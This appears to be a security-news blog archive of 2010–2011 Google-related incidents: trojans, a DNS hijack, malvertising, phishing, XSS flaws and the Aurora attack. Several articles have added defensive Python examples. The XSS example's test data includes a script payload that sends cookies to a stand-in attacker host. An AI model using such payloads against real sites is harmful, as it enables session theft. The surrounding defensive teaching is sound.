CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts

Archive for the ‘Google’ Category

Android Market Security Update Released By Google Contained Mobile Trojan

Thursday, March 10th, 2011

Chinese hackers are distributing a mobile trojan to users as a repackaged version of the Android Market security update released by Google last week.

Repackaging legit Android apps with trojans is becoming a common propagation method for mobile malware targeting Google’s operating system. The trend began in Russia, where the motivation behind the malicious programs was to steal credit by silently sending text messages to premium rate numbers.

Then it moved to China where more sophisticated Android malware variants were caught performing click fraud or displaying botnet-like capabilities. The problem reached a global audience when over 50 apps were rigged with a trojan and published on the Android Market under different names.

Google took them down last week shortly after being notified and used the remote uninstall feature to remove the trojan from infected devices. However, the malware also used a public exploit to root the device before installing itself, so the company also pushed an over-the-air update called “Android Market Security Tool” to undo it.

Security researchers from F-Secure and Symantec now warn that Chinese hackers have ironically repackaged this security tool with a new trojan dubbed Android.Bgserv.

Like most Android malware, Bgserv sends device identification codes (IMEI) to a remote server and can receive commands. According to Symantec, it can be ordered to send SMS messages to a number specified by attackers which means it can theoretically be used to steal credit.

“Analysis of the application is still ongoing, however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License,” the Symantec experts write.

The trojanized app is distributed from unregulated market places, which are common in China where there is no official Android Market. “This malware appears to be specific to a mainland Chinese network, as it contacts the number 10086 (related to China Mobile Net) and uses the new APN with the name ‘cmnet’ inserted in the APN list,” note security researchers from F-Secure.

Credit: Softpedia.com News

Google Bangladesh Google.com.bd DNS Hijacked, Redirects Visitors For A Limited Time

Monday, January 10th, 2011

A hacker managed to hijack the DNS for google.com.bd and redirect the domain’s traffic to a website under their control for a limited period of time on Saturday. Many Bangladeshi Internet users reported being taken to a page saying that Google Bangladesh was “OwN3D by TiGER-M@TE.”

According to TechCrunch, Google confirmed the incident but said the problem occurred at the Bangladesh Telecommunications Company, which administers the .bd domain zone. TechIt reports that the hijacking affected only google.com.bd, with www.google.com.bd continuing to display Google’s real website. Under normal circumstances, requests made to google.com.bd are automatically redirected to www.google.com.bd, so it appears that only the bare domain’s record was tampered with and that the redirect step was what the attacker intervened in.

No details are available about the method used to alter or poison the DNS entries for Google’s domain, but according to Web defacement archive Zone-H, TiGER-M@TE is responsible for attacks against many Bangladeshi websites.

These include www.waridtel.com.bd and www.bd.airtel.com, which belong to the Airtel telecommunications provider, as well as americanexpress.com.bd, the local branch of American Express.

DNS or domain hijacking incidents are not uncommon. In fact, their number appears to have increased during the past two years, especially for those involving high profile websites. Last month fraudsters hijacked the domain name of ChronoPay, the largest online payment processor in Russia and used the opportunity to phish credit card information.

In November, hackers managed to alter the DNS records for secunia.com, the domain name of one of the world’s leading vulnerability research firms. Other companies affected by similar attacks include Tata Consultancy Services (TCS), the largest IT and outsourcing provider in India, Baidu, the largest search engine in China, Twitter and Comcast, the largest US ISP.

The methods used to carry out these hijackings vary, but usually attackers rely on social engineering to trick employees at domain registrars to hand over control of the domains by posing as the real owners.

Credit: Softpedia.com News

Scareware Malvertizements Approved By Google And Microsoft Ad Systems, Served On msnbc.com, mail.live.com

Saturday, December 11th, 2010

Malware distributors have managed to trick two large ad networks into delivering malvertizements that silently infected the visitors of large websites with scareware.

The attacks started on December 3 and were picked up by a cloud-based malware scanning service called HackAlert and operated by Santa Clara-based security vendor Armorize Technologies.

HackAlert is used by VeriSign Trust Services, now a division of Symantec, for its daily VeriSign Trust Seal malware scans. So when several high profile websites started being tagged as infected, Armorize was asked to check its platform for possible bugs. However, their investigation revealed that sites like realestate.msn.com, msnbc.com, scout.com or mail.live.com, were indeed inadvertently infecting their visitors with malware.

It appears that cyber criminals registered a domain called adshufffle.com (three “f”-s) and posed as a legit advertising company named AdShuffle. They somehow managed to get their domain accepted on both the Google-owned DoubleClick network and rad.msn.com, the server used by Microsoft to deliver ads of various sites, including Hotmail and MSN.

The rogue ads served from this domain were not regular scareware malvertizements (malicious advertisements) that falsely claim visitors are infected and offer them a program to fix it. They looked harmless, but loaded the Eleonore drive-by download toolkit in the background. This toolkit silently exploits vulnerabilities in outdated versions of popular applications like Java, Adobe Reader, Internet Explorer and even Windows.

“Users visit websites that incorporate banner ads from DoubleClick or rad.msn.com, the malicious javascript is served from ADShufffle.com (notice the three f’s), starts a drive-by download process and if successful, HDD Plus and other malware are installed into the victim’s machine, without having the need to trick the victim into doing anything or clicking on anything. Simply visiting the page infects the visitors,” notes Wayne Huang, chief technology officer at Armorize and member of the team who researched the attack.

HDD Plus is one of the recent pieces of scareware that pose as hard disk defragmentation utilities. The other malware downloaded by the malvertizements was a trojan downloader.
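The rogue domain in this attack differed from the vendor it impersonated by a single extra letter, which an exact-match allowlist will not catch if the lookalike was approved as its own entry. As an added example (not code from the article, from Armorize or from either ad network), the Python below takes the hosts that a page’s ad scripts load from, checks them against an allowlist of approved vendors and flags near misses by edit distance. The allowlist entries and the sample URLs are constructed for the example, and the “last two labels” shortcut for the registrable domain is an assumption that is adequate for .com/.net names but not for ccTLD second-level domains.

```python
"""Flag ad-serving hosts that look like, but are not, an approved ad vendor.

Added example (not code from the original article or from Armorize): the
rogue domain in the article differed from the real vendor's name by one
extra letter.  A distance check against the allowlist catches the near
miss.  Host names and sample URLs below are constructed for the example.
"""
from urllib.parse import urlsplit

# Constructed allowlist of vendors an ad operations team has approved.
APPROVED_AD_HOSTS = {
    "adshuffle.com",
    "doubleclick.net",
    "rad.msn.com",
}

def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

def registrable(host: str) -> str:
    """Crude 'last two labels' approximation of the registrable domain.

    Assumption: fine for .com/.net style names used here; a real deployment
    would use the Public Suffix List (google.com.bd would break this).
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def classify_host(host: str, max_distance: int = 2) -> str:
    """Return 'approved', 'lookalike' or 'unknown' for an ad-serving host."""
    h = host.lower()
    if h in APPROVED_AD_HOSTS or registrable(h) in APPROVED_AD_HOSTS:
        return "approved"
    reg = registrable(h)
    for good in APPROVED_AD_HOSTS:
        if 0 < levenshtein(reg, registrable(good)) <= max_distance:
            return "lookalike"
    return "unknown"

def scan_script_urls(urls):
    """Return [(url, verdict)] for every script URL that is not 'approved'."""
    findings = []
    for url in urls:
        host = urlsplit(url).hostname or ""
        verdict = classify_host(host)
        if verdict != "approved":
            findings.append((url, verdict))
    return findings

# Constructed sample of script sources observed on a page.
SAMPLE_URLS = [
    "http://ad.doubleclick.net/adj/site/front;sz=728x90",
    "http://rad.msn.com/ADSAdClient31.dll?GetSAd=&PG=HTML",
    "http://adshufffle.com/ads/show.js",        # three f's, as in the article
    "http://cdn.example-analytics.net/t.js",    # placeholder unknown host
]

if __name__ == "__main__":
    for url, verdict in scan_script_urls(SAMPLE_URLS):
        print(f"{verdict:9s} {url}")
```

Run over the sample, the three-f domain is reported as a lookalike of adshuffle.com and the analytics host as unknown; the two genuine ad-network hosts pass. The distance threshold of 2 is a judgement call: tighter catches fewer typos, looser produces more unknown-versus-lookalike noise for short vendor names.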

Credit: Softpedia.com News

New Gmail Phishing Campaign Attempts To Steal Login Credentials

Wednesday, September 8th, 2010

Security researchers from Sunbelt warn of a new wave of spam emails that masquerade as official communications from Google in an attempt to steal login credentials from Gmail users.

The fake emails are well formulated and display visual elements associated with the Web search giant, such as the Google Accounts logo or the copyright notice.

The messages purport to originate from the Google Team and read as follows:

“Hello,

Your Google account information is incomplete, We recommend that you update your Google account for security reasons.

Download and open the attachment in this mail and follow the direction to update your Google account.”

The attached file is an HTML document called Gmail_access.html. Opening it in any browser will display a fake page almost identical to the one used to sign into Gmail.

In fact the images and other elements present on the rogue page are actually loaded from Google’s real website. “If you check the attachment source code you can see that it sucks genuine Gmail page elements,” Tom Kelchner, writes on the Sunbelt blog.

The fake sign-in form sends the entered data to a ServiceLoginAuth.php script hosted on an external domain, which stores it for the attackers. “The information entered on the bogus page is snatched by a site registered to someone in Sremska Kamenica, Serbia,” Kelchner explains.

However, this seems to be a legit website that has been compromised, as it runs an outdated and probably vulnerable version of the e107 content management system. This campaign appears to have started sometime at the beginning of this month as there are reports about it on the official Gmail help forum dating back to September 1.

Fortunately, there is a simple way for users to check whether they are on the real Gmail login page: Google serves the genuine sign-in page over SSL from its own domain by default, so a sign-in form that was opened from a local HTML attachment (a file:// address, with no HTTPS connection to google.com) is not it.
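As an added example (not Sunbelt’s analysis tooling and not code from the original article), the Python below parses an HTML attachment of the kind described, records where the page loads its images, stylesheets and scripts from, and flags any form containing a password field whose action points to a different host. That mismatch is exactly the pattern described here: genuine Gmail page elements, credentials posted elsewhere. The sample attachment and the host compromised.example.net are constructed placeholders; the script name ServiceLoginAuth.php is the one the article mentions.

```python
"""Inspect an HTML attachment for a credential form that posts off-site.

Added example, not code from Sunbelt or the original article.  The
attachment described in the article borrowed real Gmail page elements but
sent the form to a PHP script on an unrelated domain; the check below makes
that mismatch visible.  The HTML sample is constructed for the example and
the host compromised.example.net is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

class FormAudit(HTMLParser):
    """Collect form actions, password fields, and resource hosts."""

    def __init__(self):
        super().__init__()
        self.forms = []            # [{'action', 'method', 'has_password'}]
        self.resource_hosts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
            })
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self.forms:
                self.forms[-1]["has_password"] = True
        elif tag in ("img", "script", "link"):
            url = a.get("src") or a.get("href") or ""
            host = urlsplit(url).hostname
            if host:
                self.resource_hosts.add(host.lower())

def audit_attachment(html: str):
    """Return findings for password forms whose action host is not a host
    the page loads its own assets from.  A phishing page that clones a real
    login page typically fails exactly this test."""
    p = FormAudit()
    p.feed(html)
    findings = []
    for f in p.forms:
        if not f["has_password"]:
            continue
        host = (urlsplit(f["action"]).hostname or "").lower()
        if host not in p.resource_hosts:
            findings.append({
                "action": f["action"],
                "action_host": host or "(relative/local)",
                "resource_hosts": sorted(p.resource_hosts),
            })
    return findings

# Constructed sample modelled on the described attachment: genuine-looking
# assets from google.com, form posting to a ServiceLoginAuth.php elsewhere.
SAMPLE_ATTACHMENT = """
<html><head>
<link rel="stylesheet" href="https://www.google.com/accounts/style.css">
</head><body>
<img src="https://www.google.com/images/logo.gif">
<form method="post" action="http://compromised.example.net/ServiceLoginAuth.php">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_attachment(SAMPLE_ATTACHMENT):
        print("credential form posts to", f["action_host"],
              "but page assets come from", ", ".join(f["resource_hosts"]))
```

The check is deliberately structural rather than signature-based: it does not need to know the attacker’s domain in advance, only that a page claiming to be Google’s sign-in form should submit credentials to the same place it gets its logo from. A relative action (an empty host) is reported too, since a locally opened attachment has no legitimate relative target.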

Credit: Softpedia.com News

YouTube Cross-site Scripting Flaw Abused By Hackers, Redirects Visitors To Fake Or Malicious Sites

Monday, July 5th, 2010

Hackers and pranksters began exploiting a newly discovered scripting flaw on YouTube on Sunday, provoking rumours that a virus was spreading on the site.

The cross-site scripting flaw (XSS) on the video-sharing website created a means for hackers to post JavaScript code in the comments sections of videos. The flaw meant that this JavaScript code was run on the machines of surfers viewing the same video clip.

Predictably enough, pranksters at 4Chan have begun using the vulnerability to redirect surfers looking for Justin Bieber video clips to goatse or to false reports that the irksomely clean-cut Canadian singer had died in a car crash. Denizens of 4Chan are separately trying to rig an online poll to encourage Bieber to play North Korea on an upcoming tour.

In other cases the flaw has become the fodder of comment spam. Google iced the problem hours after it first appeared, techie-buzz.com reports.

“We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago,” said Google. “Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.”

The appearance of the vulnerability sparked rumours on Twitter and elsewhere that a virus was spreading across YouTube. A blog post by Chris Boyd of Sunbelt charts the genesis of this rumour, which is just the sort of thing that’s likely to be used in new anti-virus (scareware) scams.

Security watchers at the Internet Storm Centre note that the vulnerability on YouTube might potentially have been used for all manner of hacking attacks, including password stealing scams.

“They [hackers] could steal your YouTube cookies, which probably doesn’t mean much to them, but they could also post various JavaScript code that will execute in your browser, in the context of YouTube,” an ISC handler writes. “I’ve seen nasty XSS attacks that are used to fake whole login screens and we know how many people use [the] same passwords for multiple accounts.”

Credit: The Register

Google Street View Collected Personal Data From WiFi Networks

Saturday, May 15th, 2010

Google has said that its world-roving Street View cars have been collecting information sent over open WiFi networks, contradicting previous assurances by the company. This means that Google may have collected emails and other private information if they traveled over WiFi networks while one of the cars was in range. Previously, the company said no payload data was ever intercepted.

In a blog post published on Friday afternoon, the company said that it collected the data by “mistake” and that the data has not been used in any Google products. Street View cars have now been grounded, according to the post, and the company has promised to delete the data. But before doing so, it will be asking regulators in “the relevant countries” how this should be done.

It arrives less than three weeks after the company said that such data was not being collected. But since then, Google conducted a review of the data being collected by its Street View cars after the data protection authority (DPA) in Hamburg, Germany requested such an audit.

Ginger McCall, a staff counsel with the Electronic Privacy Information Center (EPIC), a public watchdog, calls the data collection a “violation of customers’ trust,” and she questions Google’s claim that it was collecting the data by mistake. “People need to ask why Google was collecting this information,” McCall told The Reg. “It’s difficult to believe that this would be done accidentally.

“This really flies in the face of their assertion that customers should just trust them.”

On April 27, in response to a complaint from the German DPA, a Google blog post said that in scanning open WiFi networks its Street View cars were collecting only the SSIDs that identify the networks and MAC addresses that identify particular network hardware, including routers. Google uses this data in products that rely on location data, such as Google Maps.

But the company now says that when Street View cars began collecting this data, it accidentally included some additional code with the cars’ software. “So how did this happen? Quite simply, it was a mistake,” today’s blog post reads. “In 2006, an engineer working on an experimental WiFi project wrote a piece of code that sampled all categories of publicly broadcast WiFi data.

“A year later, when our mobile team started a project to collect basic WiFi network data like SSID information and MAC addresses using Google’s Street View cars, they included that code in their software — although the project leaders did not want, and had no intention of using, payload data.”

As EPIC’s McCall says that Google’s admission undermines trust in the company, Google seems to acknowledge as much. “Maintaining people’s trust is crucial to everything we do, and in this case we fell short,” the company says.

In response, the company says it will ask a third party to review its WiFi data collection software and to confirm that it deleted the data appropriately. It also says it will review its “procedures to ensure that our controls are sufficiently robust to address these kinds of problems in the future.”
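The distinction Google draws here, between network identifiers that access points broadcast in beacon frames and payload data carried in data frames, is one a collector can enforce in code rather than by intent. As an added example (not Google’s Street View software, whose code the article does not show), the Python below parses raw 802.11 frames, keeps only the BSSID and SSID from beacon frames, and counts data frames without retaining any of their bytes. The frames are constructed inside the block; the MAC addresses, SSIDs and the HTTP payload are placeholders.

```python
"""Collect only SSID and BSSID from raw 802.11 frames, discarding payloads.

Added example, not Google's Street View code.  The article says the intended
collection was SSID and MAC address but the shipped code sampled everything.
This parser makes the boundary explicit: beacon (management) frames yield
the network name and BSSID; data frames are counted and their bodies are
never retained.  The frames below are constructed for the example.
"""
import struct

FC_TYPE_MGMT, FC_TYPE_DATA = 0, 2
SUBTYPE_BEACON = 8
MAC_HDR_LEN = 24               # FC(2) duration(2) addr1..3(18) seq ctl(2)
BEACON_FIXED_LEN = 12          # timestamp(8) + beacon interval(2) + capability(2)
IE_SSID = 0                    # information element tag for the SSID

def frame_type(frame: bytes):
    """Return (type, subtype) from the first frame-control byte."""
    fc0 = frame[0]
    return (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_beacon(frame: bytes):
    """Return (bssid, ssid) from a beacon frame, or None if malformed."""
    if len(frame) < MAC_HDR_LEN + BEACON_FIXED_LEN:
        return None
    bssid = mac_str(frame[16:22])          # addr3 carries the BSSID in beacons
    body = frame[MAC_HDR_LEN + BEACON_FIXED_LEN:]
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:            # truncated information element
            return None
        if tag == IE_SSID:
            return bssid, value.decode("utf-8", "replace")
        i += 2 + length
    return bssid, ""                       # no SSID element at all

def collect(frames):
    """Survey a capture: keep {bssid: ssid}; count data frames, keep no bytes of them."""
    networks = {}
    dropped_data_frames = 0
    for frame in frames:
        ftype, subtype = frame_type(frame)
        if ftype == FC_TYPE_MGMT and subtype == SUBTYPE_BEACON:
            parsed = parse_beacon(frame)
            if parsed:
                networks[parsed[0]] = parsed[1]
        elif ftype == FC_TYPE_DATA:
            dropped_data_frames += 1       # payload deliberately never inspected or stored
    return networks, dropped_data_frames

# --- constructed test frames (placeholder addresses and contents) -----------
def build_beacon(bssid: bytes, ssid: bytes) -> bytes:
    hdr = bytes([0x80, 0x00]) + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0401)    # timestamp, interval, capability
    ies = bytes([IE_SSID, len(ssid)]) + ssid
    return hdr + fixed + ies

def build_data(src: bytes, dst: bytes, payload: bytes) -> bytes:
    hdr = bytes([0x08, 0x02]) + b"\x00\x00" + dst + src + src + b"\x00\x00"  # FromDS set
    return hdr + payload

SAMPLE_FRAMES = [
    build_beacon(b"\x00\x11\x22\x33\x44\x55", b"HomeNet"),
    build_data(b"\x00\x11\x22\x33\x44\x55", b"\x66\x77\x88\x99\xaa\xbb",
               b"GET /mail HTTP/1.1\r\nCookie: SID=secret\r\n"),
    build_beacon(b"\xaa\xbb\xcc\xdd\xee\xff", b""),       # hidden SSID
]

if __name__ == "__main__":
    nets, dropped = collect(SAMPLE_FRAMES)
    print(nets, "data frames dropped:", dropped)
```

The survey result contains the two networks and the count of one dropped data frame, and nothing from the HTTP request in the data frame survives into the output. Real captures also carry QoS and four-address data headers of other lengths; that does not matter to this collector because it never parses a data frame beyond its first byte.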

Separately, the company will soon offer SSL encryption for its core search service. In July 2008, Google added an HTTPS-only option to its Gmail email service, and in mid-January, just after announcing that alleged Chinese hackers had nabbed intellectual property from its internal systems, it turned on SSL by default.

It also offers SSL as an option with its Calendar, Docs, and Sites services, and just recently, it began doing the same with Google Web History and Google Bookmarks, after a security vulnerability was found in the search personalization service that taps Web History.

Google says that following today’s admission, its Street View cars will stop collecting WiFi data entirely, including SSIDs and MAC addresses. But presumably, they will not stop collecting photos of every street on the planet and posting them online.

Credit: The Register

Trojan Poses As Google Chrome Browser Extension

Monday, April 19th, 2010

Miscreants have created a Trojan that poses as a Google Chrome extension. Spammed messages attempt to dupe prospective marks into trying an add-on that “helps you better organize your documents received in your email”.

Interested parties are pointed towards a counterfeit Google Chrome Extensions page, which offers a malware executable. More observant punters will notice that the download is offered in an .exe file and not a .crx Google Chrome extension. Such markers are easily missed, however.

The Trojan horse malware on offer (identified by Romanian security firm BitDefender as Agent-20577) blocks access to Google and Yahoo web pages. Attempts to reach these sites from infected machines are hijacked and redirected to counterfeit sites. Such trickery is commonly either a prelude to phishing attacks or a way for the hackers behind it to earn affiliate income from scareware slingers or other undesirables.

The appearance of the attack shows that cybercrooks have begun targeting Google Chrome users, something that only tends to happen when a product or service becomes widely used among end users and is therefore a compliment (of sorts) to the success of Google’s browser technology.

Credit: The Register

French Registrar Gandi.net Takes Down Anti-Google Privacy Proxy

Tuesday, April 6th, 2010

A recently launched anonymization service suffered a setback last week when Gandi.net, a France-based registrar that bills itself as a “no bullshit company,” revoked its secure sockets layer certificate without warning.

Last week’s move against GoogleSharing caused its 30,000 users to instantly lose service, according to Moxie Marlinspike, the hacker who announced the anonymization proxy in mid January. It took him four days to get the site operational again, and by then, the vast majority of those users had stopped using the service.

In an email sent more than 24 hours later, a member of Gandi.net’s abuse department said the certificate was revoked “due to multiple and deliberate serious breaches” of the registrar’s terms of service. Specifically, the violations were incorrect information provided to Gandi.net’s Whois database, a trademark violation for the unauthorized use of “google” in the domain name and the use of the certificate for unspecified “fraudulent activities.”

GoogleSharing prevents Google from tracking searches and websites visited by specific individuals by mixing together requests from many different users so it’s impossible to tell where the queries originate. A Firefox plugin redirects Google-bound traffic to a proxy, where requests are stripped of all identifying information and replaced with the details of a different GoogleSharing user. The Google response is then proxied back to the originating user.

“GoogleSharing thrives by being totally transparent to the end user,” Marlinspike wrote in an email. “They install the addon and never have to think about it again. They don’t have to do anything special or visit any special websites. By causing a four day interruption, they’ve likely killed the majority of our user base.”

The hacker said it was true that some of the information contained in the Whois database was not correct, but he insisted the service doesn’t engage in fraud and that the inclusion of “google” in his domain name is protected by the fair use doctrine.

The revocation meant that, in an instant, people who relied on GoogleSharing to anonymize Google search requests were unable to use the service. Because the Firefox add-on sends its traffic to the proxy over an SSL-authenticated connection, those connections simply failed once the certificate was revoked, with little explanation and no recourse.

The episode demonstrates the hazards of relying on internet companies that enforce terms of service reserving the right to play judge, jury and executioner with their customers’ websites. Gandi.net took the action with no warning and didn’t provide an explanation for more than a day. And even then, it failed to say exactly what “fraudulent activities” GoogleSharing had carried out.

So much for Gandi.net’s claims of being a “no bullshit company.”

“It’s a big claim to make,” the company’s marketing monkeys write. Among other things, it means employees “are honest about what we do; we will be straightforward in how we deal with you” and “if we’re ever hypocritical we will hold our hands up and clean up.”

Conspiracy-minded observers might be tempted to point out that over the past decade Marlinspike has regularly been a thorn in the side of companies who make big bucks issuing the certificates used to authenticate banks, online retailers, and other groups with sensitive websites. By demonstrating practical attacks that allow hackers to spoof the widely used credentials, his research calls into question the effectiveness of SSL certificates and the companies that issue and use them.

Already, eBay-owned PayPal has retaliated against the independent researcher for showing how the criminals could impersonate the online payments processor. Now, Gandi.net has followed a similar course.

But the consequences of the revocation are far from over. Whereas the service pushed an average of 4Mbps before, it was generating only about 300kbps after it came back online.

Which seems to suggest that if you’re doing anything considered remotely controversial on the net, you’re better off relying on yourself for payment and certificate services. The internet isn’t a democracy, and companies with self-serving terms of service can’t be counted on to deliver due process. Not even those that bill themselves as “no bullshit.”

Credit: The Register

Google Buzz Vulnerability Reveals User Geo Location

Tuesday, February 16th, 2010

Already besieged by complaints of shoddy user privacy, Google Buzz is susceptible to exploits that allow an attacker to commandeer accounts and even learn where victims are located, a security researcher said Tuesday.

The XSS, or cross-site scripting, vulnerability is unusual because it affects google.com, the domain that sets authentication cookies for a variety of popular Google services, including Mail, Calendar and Documents. That means an attacker might be able to hijack victims’ accounts simply by tricking them into visiting a booby-trapped link.

What’s more, the vulnerability ties into the much-vaunted Google Location Services, making it possible for the attacker to learn the geographical location of users who have already opted in.

“It’s a pretty nasty vulnerability, actually,” Robert “RSnake” Hansen, CEO of secTheory.com, said. “If you’ve already agreed to that before being exploited, which most people will do, then the attacker also gets to know your location.”

The vulnerability is the result of web applications that fail to adequately scrutinize user input for malicious commands that inject unauthorized content and javascript into browsers visiting google.com addresses. The vulnerability, which Hansen said was reported by a hacker known as TrainReq, is also notable because it works over the SSL, or secure sockets layer, protocol.

The resulting “https” and “google.com” included in the address is likely to lead some victims into believing the address is safe, he said.

Over the years, Google engineers have done a good job at fortifying the site against XSS flaws. In the rare instances the bugs get through, Google personnel are usually quick at stamping them out once they’ve been reported.
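This Buzz bug and the YouTube comment XSS above come from the same failure: user-supplied text placed into a google.com page without being neutralised, so it runs for other visitors in the site’s origin, where it can read cookies or draw a fake login screen as the ISC handler describes. As an added example (not Google’s code, and not a reproduction of either actual bug, neither of which the articles show), the Python below renders a comment with a display name, body and link the vulnerable way and the hardened way (HTML escaping for the text and attribute contexts, a scheme allowlist for the link) and checks which of a few constructed hostile comments still carry live markup. The comments and the crude markup checker are constructed for the example.

```python
"""Stored XSS: rendering untrusted comments unescaped versus escaped.

Added example, not YouTube's or Google Buzz's code.  It models the failure
both articles describe: user input placed into a page without being
neutralised, so a comment can carry JavaScript that runs for every other
viewer in the site's origin.  The comments below are constructed.
"""
import html
from urllib.parse import urlsplit

def render_comment_unsafe(author: str, text: str, link: str) -> str:
    """What a vulnerable renderer does: trusts the input verbatim."""
    return f'<div class="c"><a href="{link}">{author}</a>: {text}</div>'

def safe_url(link: str) -> str:
    """Allow only http(s) links; anything else (javascript:, data:) becomes '#'."""
    scheme = urlsplit(link.strip()).scheme.lower()
    return link if scheme in ("http", "https") else "#"

def render_comment_safe(author: str, text: str, link: str) -> str:
    """Escape for the HTML text and attribute contexts; allowlist the URL scheme."""
    return '<div class="c"><a href="{href}">{author}</a>: {text}</div>'.format(
        href=html.escape(safe_url(link), quote=True),
        author=html.escape(author, quote=True),
        text=html.escape(text, quote=True))

def contains_active_markup(rendered: str) -> bool:
    """Crude demo check: does the output still contain a live script tag or JS URL?"""
    low = rendered.lower()
    return "<script" in low or "javascript:" in low

# Constructed comments: one benign, then a body injection and a link injection.
SAMPLE_COMMENTS = [
    ("alice", "great video", "https://example.org/alice"),
    ("mallory", '<script>location="http://evil.example/?c="+document.cookie</script>',
     "https://example.org/m"),
    ("mallory", "nice", "javascript:alert(document.domain)"),
]

def demo():
    """Return (unsafe_hits, safe_hits): comments that keep active markup each way."""
    unsafe = sum(contains_active_markup(render_comment_unsafe(*c)) for c in SAMPLE_COMMENTS)
    safe = sum(contains_active_markup(render_comment_safe(*c)) for c in SAMPLE_COMMENTS)
    return unsafe, safe

if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print(render_comment_safe(*c))
    print("active markup survives: unsafe=%d safe=%d" % demo())
```

The point of the two-context treatment is that escaping alone does not make a link safe: html.escape leaves “javascript:alert(1)” untouched because it contains nothing to escape, so the href needs a scheme allowlist, while the body and attribute values need the escaping with quote=True so a quote in the input cannot close the attribute. Marking the session cookie HttpOnly limits the cookie-theft variant the ISC handler mentions, but does nothing against a faked login form, which is why the output encoding is the fix rather than a mitigation.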

Credit: The Register

0-day Vulnerability In Internet Explorer 6, 7 And 8 Exploited In Recent Chinese Attack

Thursday, January 14th, 2010

Microsoft published an advisory today about a critical security vulnerability in all versions of Internet Explorer (apart from version 5). While all versions of Internet Explorer are affected, the risk for everyone running Internet Explorer 8 is lower since it has DEP (Data Execution Prevention) enabled by default.

According to McAfee, hackers who breached the defenses of Google, Adobe Systems and at least 32 other companies used this vulnerability to carry out at least some of the attacks.

The previously unknown flaw in the IE browser was probably just one of the vectors used in the attacks, McAfee CTO George Kurtz wrote in a blog post. Using a sophisticated spear-phishing campaign, the perpetrators included malicious links exploiting the bug in emails and instant messages sent to employees from at least three of the targeted companies.

Contrary to previous speculation, there was no evidence vulnerabilities in Adobe’s Reader or Acrobat applications were used in any of the attacks, Kurtz said. In its own statement, Adobe concurred, saying researchers “have not been able to obtain any evidence to indicate that Adobe Reader or other Adobe technologies were used as the attack vector in this incident.”

Kurtz said his findings were based on malware samples taken from “three to five” of the targeted companies and he stressed that other zero days or exploits could have been used against other victims.

“In our investigation we discovered that one of the malware samples involved in this broad attack exploits a new, not publicly known vulnerability in Microsoft Internet Explorer,” Kurtz wrote. “Our investigation has shown that Internet explorer is vulnerable on all of Microsoft’s most recent operating system releases, including Windows 7.”

Shortly after the report, Microsoft confirmed the new IE vulnerability was “one of the vectors used in targeted and sophisticated attacks against Google and possibly other corporate networks.” A company statement said the attacks were carried out against version 6 of the widely used browser and suggested users protect themselves by enabling security features that have been added to successor versions.

McAfee’s report is the latest to shed light on one of the most significant cyberattacks in years. Google first disclosed the “highly sophisticated and targeted attack” on Tuesday, saying it originated in China and targeted its intellectual property. It added that 20 other companies suffered similar assaults, a number that independent researchers soon raised to 34. So far, only Google and Adobe have been identified as victims.

Yahoo, Symantec, Northrop Grumman and Dow Chemical have also been penetrated according to The Washington Post, citing unnamed “congressional and industry sources.”

The malware that McAfee researchers analyzed was sent to a highly select group of employees of a handful of companies that Kurtz declined to identify.

“This wasn’t something that got blasted to 300,000 people in a corporation,” Kurtz said in an interview with The Register. “It was really targeted at senior technology leaders that had access to core pieces of intellectual property, source code, et cetera.”

Kurtz has dubbed the attack “Aurora,” a reference to the filepath on the attacker’s machine that showed up in some of the malware code McAfee researchers analyzed. They believe that is the name the attackers gave to the operation. There was nothing in the binaries that indicated either way whether the code writers spoke Cantonese or Mandarin or were located in China.

The IE vulnerability stems from an invalid pointer reference that when exploited allows an attacker to execute malicious shell code on underlying machines. The malware caused exploited machines to download further malicious scripts that installed a backdoor. The machines then connected to command and control channels that were hosted on servers that resided in the US and Taiwan.

A security feature known as data execution prevention, which prevents data loaded into memory from being executed, will block the particular exploits McAfee has observed. But Kurtz warned the vulnerability exists in all versions of IE except for IE 5.01, service pack 4, and that it would be possible for attackers to work around the protection.

In an advisory, Microsoft recommended people use DEP, which by default is enabled in IE 8 but must be turned on in prior versions. The statement also advised users on Vista and later versions of Windows to run IE in protected mode. The advisory didn’t say when an update would be released that patches the vulnerability.

Credit: The Register, SANS ISC